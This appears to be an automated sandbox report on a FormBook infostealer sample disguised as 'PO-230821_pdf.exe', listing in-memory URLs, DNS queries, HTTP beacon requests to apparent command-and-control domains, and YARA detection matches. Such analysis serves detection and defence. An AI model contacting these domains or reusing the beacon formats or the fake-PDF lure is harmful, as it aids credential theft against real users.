Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.974dp.com/sn26/www.bmmboo.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.974dp.comReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ahevrlh.xyz
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ahevrlh.xyz/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ahevrlh.xyz/sn26/www.thirdmind.network
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ahevrlh.xyzReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bmmboo.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bmmboo.com/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bmmboo.com/sn26/www.ownlegalhelp.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bmmboo.comReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.canada-reservation.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.canada-reservation.com/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.canada-reservation.com/sn26/www.kentuckywalkabout.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.canada-reservation.comReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kentuckywalkabout.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kentuckywalkabout.com/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kentuckywalkabout.com/sn26/www.qcdrxwr.cfd
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kentuckywalkabout.comReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ownlegalhelp.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ownlegalhelp.com/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ownlegalhelp.com/sn26/www.4tbbwa.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ownlegalhelp.comReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qcdrxwr.cfd
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qcdrxwr.cfd/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qcdrxwr.cfd/sn26/www.uedam.xyz
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qcdrxwr.cfdReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thewhiteorchidspa.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thewhiteorchidspa.com/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thewhiteorchidspa.com/sn26/www.zachmahl.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thewhiteorchidspa.comReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thirdmind.network
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thirdmind.network/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thirdmind.network/sn26/www.thewhiteorchidspa.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thirdmind.networkReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uahrbqtj.cfd
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uahrbqtj.cfd/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uahrbqtj.cfd/sn26/www.wdlzzfkc.cfd
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uahrbqtj.cfdReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uedam.xyz
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uedam.xyz/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uedam.xyz/sn26/www.1wapws.top
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uedam.xyzReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wdlzzfkc.cfd
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wdlzzfkc.cfd/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wdlzzfkc.cfd/sn26/www.canada-reservation.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wdlzzfkc.cfdReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ymjblnvo.cfd
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ymjblnvo.cfd/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ymjblnvo.cfd/sn26/lJ
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ymjblnvo.cfdReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zachmahl.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zachmahl.com/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zachmahl.com/sn26/www.uahrbqtj.cfd
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zachmahl.comReferer:
Source: explorer.exe, 00000003.00000002.3554856830.0000000001182000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1092924750.0000000001182000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com)
Source: explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000002.3618557248.000000001104F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.3586242092.000000000542F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://whois.gandi.net/en/results?search=thirdmind.network
Source: explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000003.00000002.3618557248.000000001104F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.3586242092.000000000542F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.gandi.net/en/domain

Source: unknown

DNS traffic detected: queries for: www.974dp.com

Source: C:\Windows\explorer.exe

Code function: 3_2_11396F82 getaddrinfo,setsockopt,recv,

3_2_11396F82

Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi HTTP/1.1Host: www.974dp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi HTTP/1.1Host: www.bmmboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi HTTP/1.1Host: www.ownlegalhelp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpi HTTP/1.1Host: www.4tbbwa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpi HTTP/1.1Host: www.ahevrlh.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpi HTTP/1.1Host: www.thirdmind.networkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=pgVZ8pYUx/mb3SHekAxrqKnjfvNT295Kch72LXoG5YoxLYYfuZ6zPfF7UahT16hGXPUe&ML0tl=NZlpi HTTP/1.1Host: www.thewhiteorchidspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpi HTTP/1.1Host: www.uahrbqtj.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405809

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.3619293935.00000000113AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: PO-230821_pdf.exe PID: 7080, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: PO-230821_pdf.exe PID: 7148, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 6216, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PO-230821_pdf.exe

Source: PO-230821_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
